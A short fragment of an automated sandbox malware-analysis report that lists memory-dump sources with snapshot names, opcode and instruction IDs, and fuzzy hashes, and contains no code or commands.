                                                                        • Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86fb7129fa38cf01faefcc202cbf90545663fe484ec3a5d9a5c05933f49f1e4e
                                                                        • Instruction ID: c105d909e736b731ce82ab5ec3c5c06dd0a40afaff69d93d0b99f52d49e7775d
                                                                        • Opcode Fuzzy Hash: 86fb7129fa38cf01faefcc202cbf90545663fe484ec3a5d9a5c05933f49f1e4e
                                                                        • Instruction Fuzzy Hash: 2BC012344003054BD569FB75FC44555736BE6D0515F409A30B0051D54DAEBD6C965791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \;q$\;q$\;q$\;q
                                                                        • API String ID: 0-2933265366
                                                                        • Opcode ID: 90ce7fcf10ed65b0d2b063d2a6733904e36ccad9a5e77a21ed5f9e971943836d
                                                                        • Instruction ID: 676f97ed7a429181496252cf97e8bffec233b5dad9f03eea2da2544abc2333b4
                                                                        • Opcode Fuzzy Hash: 90ce7fcf10ed65b0d2b063d2a6733904e36ccad9a5e77a21ed5f9e971943836d
                                                                        • Instruction Fuzzy Hash: D201A231730A168FD7249E2DC9C1AE577E6BF88BA0729417AE606CB3B1DA71EC418750